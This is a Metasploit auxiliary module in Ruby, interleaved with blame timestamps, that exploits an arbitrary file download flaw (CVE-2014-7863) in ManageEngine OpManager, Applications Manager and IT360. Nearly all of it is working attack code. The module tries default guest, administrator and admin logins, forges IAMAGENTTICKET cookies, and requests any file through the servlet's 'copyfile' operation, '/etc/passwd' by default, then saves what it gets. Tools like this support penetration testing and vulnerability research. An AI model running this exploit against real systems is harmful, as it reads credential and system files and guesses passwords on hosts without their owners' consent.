2015-01-28 19:42:17 +00:00
|
|
|
##
|
2015-02-01 20:16:09 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2015-01-28 19:42:17 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
2015-01-30 21:21:17 +00:00
|
|
|
'Name' => "ManageEngine Multiple Products Arbitrary File Download",
|
2015-01-28 19:42:17 +00:00
|
|
|
'Description' => %q{
|
2015-01-30 21:21:17 +00:00
|
|
|
This module exploits an arbitrary file download vulnerability in the FailOverHelperServlet
|
|
|
|
on ManageEngine OpManager, Applications Manager and IT360. This vulnerability is
|
|
|
|
unauthenticated on OpManager and Applications Manager, but authenticated in IT360. This
|
|
|
|
module will attempt to login using the default credentials for the administrator and
|
|
|
|
guest accounts; alternatively you can provide a pre-authenticated cookie or a username
|
|
|
|
and password combo. For IT360 targets enter the RPORT of the OpManager instance (usually
|
|
|
|
8300). This module has been tested on both Windows and Linux with several different
|
|
|
|
versions. Windows paths have to be escaped with 4 backslashes on the command line. There is
|
2015-02-05 18:36:47 +00:00
|
|
|
a companion module that allows the recursive listing of any directory. This
|
2015-01-30 21:21:17 +00:00
|
|
|
vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.
|
2015-01-28 19:42:17 +00:00
|
|
|
},
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
2015-01-30 21:21:17 +00:00
|
|
|
['CVE', '2014-7863'],
|
2015-02-01 10:49:48 +00:00
|
|
|
['OSVDB', '117695'],
|
2015-10-28 15:45:02 +00:00
|
|
|
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
|
|
|
|
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
|
2015-01-28 19:42:17 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Jan 28 2015'))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(80),
|
2015-01-30 21:21:17 +00:00
|
|
|
OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
|
2015-01-30 21:26:25 +00:00
|
|
|
OptString.new('FILEPATH', [true, 'Path of the file to download', '/etc/passwd']),
|
2015-01-30 21:21:17 +00:00
|
|
|
OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
|
|
|
|
OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),
|
|
|
|
OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),
|
|
|
|
OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
|
2015-01-28 19:42:17 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
def get_cookie
|
2015-01-30 21:26:25 +00:00
|
|
|
cookie = nil
|
2015-01-28 19:42:17 +00:00
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => normalize_uri(datastore['TARGETURI'])
|
|
|
|
})
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
if res
|
2015-01-30 21:26:25 +00:00
|
|
|
cookie = res.get_cookies
|
2015-01-28 19:42:17 +00:00
|
|
|
end
|
|
|
|
|
2015-01-30 21:26:25 +00:00
|
|
|
cookie
|
|
|
|
end
|
2015-01-28 19:42:17 +00:00
|
|
|
|
|
|
|
def detect_it360
|
|
|
|
res = send_request_cgi({
|
2015-01-30 21:26:25 +00:00
|
|
|
'uri' => '/',
|
2015-01-28 19:42:17 +00:00
|
|
|
'method' => 'GET'
|
|
|
|
})
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
|
|
|
return true
|
|
|
|
end
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
return false
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_it360_cookie_name
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
2015-01-30 21:26:25 +00:00
|
|
|
'uri' => normalize_uri('/')
|
2015-01-28 19:42:17 +00:00
|
|
|
})
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
cookie = res.get_cookies
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
|
|
|
|
return $1
|
|
|
|
else
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def authenticate_it360(port, path, username, password)
|
2015-01-30 21:26:25 +00:00
|
|
|
if datastore['DOMAIN_NAME'].nil?
|
2015-01-28 19:42:17 +00:00
|
|
|
vars_post = {
|
2015-01-30 21:26:25 +00:00
|
|
|
'LOGIN_ID' => username,
|
|
|
|
'PASSWORD' => password,
|
|
|
|
'isADEnabled' => 'false'
|
2015-01-28 19:42:17 +00:00
|
|
|
}
|
|
|
|
else
|
|
|
|
vars_post = {
|
2015-01-30 21:26:25 +00:00
|
|
|
'LOGIN_ID' => username,
|
|
|
|
'PASSWORD' => password,
|
|
|
|
'isADEnabled' => 'true',
|
|
|
|
'domainName' => datastore['DOMAIN_NAME']
|
2015-01-28 19:42:17 +00:00
|
|
|
}
|
|
|
|
end
|
|
|
|
|
|
|
|
res = send_request_cgi({
|
2015-01-30 21:26:25 +00:00
|
|
|
'rport' => port,
|
2015-01-28 19:42:17 +00:00
|
|
|
'method' => 'POST',
|
|
|
|
'uri' => normalize_uri(path),
|
|
|
|
'vars_get' => {
|
2015-01-30 21:26:25 +00:00
|
|
|
'service' => 'OpManager',
|
|
|
|
'furl' => '/',
|
2015-01-28 19:42:17 +00:00
|
|
|
'timestamp' => Time.now.to_i
|
|
|
|
},
|
|
|
|
'vars_post' => vars_post
|
2015-01-30 21:26:25 +00:00
|
|
|
})
|
2015-01-28 19:42:17 +00:00
|
|
|
|
|
|
|
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
|
|
|
|
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
|
|
|
|
return res.get_cookies
|
|
|
|
end
|
|
|
|
|
2015-01-30 21:26:25 +00:00
|
|
|
nil
|
|
|
|
end
|
2015-01-28 19:42:17 +00:00
|
|
|
|
|
|
|
def login_it360
|
|
|
|
# Do we already have a valid cookie? If yes, just return that.
|
2015-01-30 21:26:25 +00:00
|
|
|
unless datastore['IAMAGENTTICKET'].nil?
|
2015-01-28 19:42:17 +00:00
|
|
|
cookie_name = get_it360_cookie_name
|
2015-01-30 21:26:25 +00:00
|
|
|
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
|
2015-01-28 19:42:17 +00:00
|
|
|
return cookie
|
|
|
|
end
|
|
|
|
|
|
|
|
# get the correct path, host and port
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
2015-01-30 21:26:25 +00:00
|
|
|
'uri' => normalize_uri('/')
|
2015-01-28 19:42:17 +00:00
|
|
|
})
|
|
|
|
|
|
|
|
if res && res.redirect?
|
|
|
|
uri = [ res.redirection.port, res.redirection.path ]
|
|
|
|
else
|
|
|
|
return nil
|
|
|
|
end
|
|
|
|
|
2015-01-30 21:26:25 +00:00
|
|
|
if datastore['USERNAME'] && datastore['PASSWORD']
|
|
|
|
print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...")
|
|
|
|
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
|
|
|
|
unless cookie.nil?
|
2015-01-28 19:42:17 +00:00
|
|
|
return cookie
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2015-01-30 21:26:25 +00:00
|
|
|
default_users = ['guest', 'administrator', 'admin']
|
|
|
|
|
|
|
|
default_users.each do |user|
|
|
|
|
print_status("#{peer} - Trying to authenticate as #{user}...")
|
|
|
|
cookie = authenticate_it360(uri[0], uri[1], user, user)
|
|
|
|
unless cookie.nil?
|
|
|
|
return cookie
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
nil
|
|
|
|
end
|
2015-01-28 19:42:17 +00:00
|
|
|
|
|
|
|
def run
|
|
|
|
# No point to continue if filepath is not specified
|
2015-01-30 21:26:25 +00:00
|
|
|
if datastore['FILEPATH'].empty?
|
|
|
|
print_error('Please supply the path of the file you want to download.')
|
2015-01-28 19:42:17 +00:00
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
if detect_it360
|
|
|
|
print_status("#{peer} - Detected IT360, attempting to login...")
|
|
|
|
cookie = login_it360
|
2015-01-30 21:26:25 +00:00
|
|
|
if cookie.nil?
|
2015-01-28 19:42:17 +00:00
|
|
|
print_error("#{peer} - Failed to login to IT360!")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
else
|
|
|
|
cookie = get_cookie
|
|
|
|
end
|
|
|
|
|
|
|
|
servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'GET',
|
|
|
|
'cookie' => cookie,
|
|
|
|
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),
|
|
|
|
})
|
|
|
|
if res && res.code == 404
|
|
|
|
servlet = 'FailOverHelperServlet'
|
|
|
|
end
|
|
|
|
|
|
|
|
# Create request
|
|
|
|
begin
|
|
|
|
print_status("#{peer} - Downloading file #{datastore['FILEPATH']}")
|
|
|
|
res = send_request_cgi({
|
|
|
|
'method' => 'POST',
|
|
|
|
'cookie' => cookie,
|
|
|
|
'uri' => normalize_uri(datastore['TARGETURI'], 'servlet', servlet),
|
|
|
|
'vars_get' => {
|
|
|
|
'operation' => 'copyfile',
|
|
|
|
'fileName' => datastore['FILEPATH']
|
2015-01-30 21:26:25 +00:00
|
|
|
}
|
2015-01-28 19:42:17 +00:00
|
|
|
})
|
|
|
|
rescue Rex::ConnectionRefused
|
|
|
|
print_error("#{peer} - Could not connect.")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# Show data if needed
|
|
|
|
if res && res.code == 200
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
if res.body.to_s.bytesize == 0
|
|
|
|
print_error("#{peer} - 0 bytes returned, file does not exist or is empty.")
|
|
|
|
return
|
|
|
|
end
|
2015-01-30 21:26:25 +00:00
|
|
|
|
2015-01-28 19:42:17 +00:00
|
|
|
vprint_line(res.body.to_s)
|
|
|
|
fname = File.basename(datastore['FILEPATH'])
|
|
|
|
|
|
|
|
path = store_loot(
|
|
|
|
'manageengine.http',
|
|
|
|
'application/octet-stream',
|
|
|
|
datastore['RHOST'],
|
|
|
|
res.body,
|
|
|
|
fname
|
|
|
|
)
|
|
|
|
print_good("File saved in: #{path}")
|
|
|
|
else
|
|
|
|
print_error("#{peer} - Failed to download file.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|